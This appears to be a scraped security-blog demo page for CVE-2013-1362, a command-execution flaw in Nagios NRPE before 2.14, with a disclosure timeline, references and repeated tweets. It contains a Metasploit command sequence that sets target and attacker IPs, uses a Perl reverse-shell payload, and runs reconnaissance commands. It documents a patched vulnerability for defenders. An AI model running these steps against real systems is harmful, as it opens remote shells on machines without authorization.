Timeline :
Vulnerability discovered and reported to vendor by Rudolph Pereira
Vulnerability patched by vendor the 2012-12-21
Vulnerability publicly disclosed by Rudolph Pereira the 2013-02-21
Metasploit PoC provided the 2013-03-19
PoC provided by :
Rudolph Pereira
jwpari
Reference(s) :
CVE-2013-1362
OSVDB-90582
BID-58142
Affected version(s) :
Nagios Remote Plugin Executor (NRPE) prior to 2.14
Tested on Ubuntu 12.10 x86 with :
Nagios Remote Plugin Executor (NRPE) 2.13
Description :
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.
Commands :
use exploit/linux/misc/nagios_nrpe_arguments set RHOST 192.168.178.54 set PAYLOAD cmd/unix/reverse_perl set LHOST 192.168.178.36 exploit id uname -a ifconfig
RT @unixfreaxjp: #Exploit #msf Demo – #CVE-2013-1362 Nagios Remote Plugin Arbitrary Command Execution http://t.co/D69ypa8iXu @eromang ht …
RT @unixfreaxjp: #Exploit #msf Demo – #CVE-2013-1362 Nagios Remote Plugin Arbitrary Command Execution http://t.co/D69ypa8iXu @eromang ht …
RT @unixfreaxjp: #Exploit #msf Demo – #CVE-2013-1362 Nagios Remote Plugin Arbitrary Command Execution http://t.co/D69ypa8iXu @eromang ht …
RT @unixfreaxjp: #Exploit #msf Demo – #CVE-2013-1362 Nagios Remote Plugin Arbitrary Command Execution http://t.co/D69ypa8iXu @eromang ht …
#Exploit #msf Demo – #CVE-2013-1362 Nagios Remote Plugin Arbitrary Command Execution http://t.co/D69ypa8iXu @eromang https://t.co/hQlcY3OyNh
CVE-2013-1362 Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo http://t.co/9Pt5CJRMNO
CVE-2013-1362 Nagios NRPE Command Execution Metasploit Demo – http://t.co/WiyAKMYFQw
CVE-2013-1362 Nagios nrpe?metasploit??? http://t.co/tpggdYyc1O https://t.co/H7wosJzEMg ??????????????????
RT @eromang: CVE-2013-1362 Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo http://t.co/HjbdB0JyfE
RT @eromang: CVE-2013-1362 Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo http://t.co/HjbdB0JyfE
Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo CVE-2013-1362 http://t.co/VLyxlFwQW4